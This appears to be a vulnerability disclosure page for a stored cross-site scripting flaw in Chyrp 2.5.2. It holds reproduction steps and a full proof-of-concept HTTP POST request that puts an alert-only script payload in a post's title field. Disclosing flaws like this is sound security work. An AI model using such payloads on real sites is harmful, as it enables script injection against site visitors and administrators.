Chyrp 2.5.2 Cross Site Scripting

2024.05.14
Credit: Ahmet Umit Bayram
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Chyrp 2.5.2 - Stored Cross-Site Scripting (XSS) # Date: 2024-04-24 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://github.com/chyrp/ # Software Link: https://github.com/chyrp/chyrp/archive/refs/tags/v2.5.2.zip # Version: 2.5.2 # Tested on: MacOS ### Steps to Reproduce ### - Login from the address: http://localhost/chyrp/?action=login. - Click on 'Write'. - Type this payload into the 'Title' field: "><img src=x onerror=alert( "Stored")> - Fill in the 'Body' area and click 'Publish'. - An alert message saying "Stored" will appear in front of you. ### PoC Request ### POST /chyrp/admin/?action=add_post HTTP/1.1 Host: localhost Cookie: ChyrpSession=c4194c16a28dec03e449171087981d11; show_more_options=true User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp, */*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br Content-Type: multipart/form-data; boundary=---------------------------28307567523233313132815561598 Content-Length: 1194 Origin: http://localhost Referer: http://localhost/chyrp/admin/?action=write_post Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers Connection: close -----------------------------28307567523233313132815561598 Content-Disposition: form-data; name="title" "><img src=x onerror=alert("Stored")> -----------------------------28307567523233313132815561598 Content-Disposition: form-data; name="body" <p>1337</p> -----------------------------28307567523233313132815561598 Content-Disposition: form-data; name="status" public -----------------------------28307567523233313132815561598 Content-Disposition: form-data; name="slug" -----------------------------28307567523233313132815561598 Content-Disposition: form-data; name="created_at" 04/24/24 12:31:57 -----------------------------28307567523233313132815561598 Content-Disposition: form-data; name="original_time" 04/24/24 12:31:57 -----------------------------28307567523233313132815561598 Content-Disposition: form-data; name="trackbacks" -----------------------------28307567523233313132815561598 Content-Disposition: form-data; name="feather" text -----------------------------28307567523233313132815561598 Content-Disposition: form-data; name="hash" 11e11aba15114f918ec1c2e6b8f8ddcf -----------------------------28307567523233313132815561598--


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top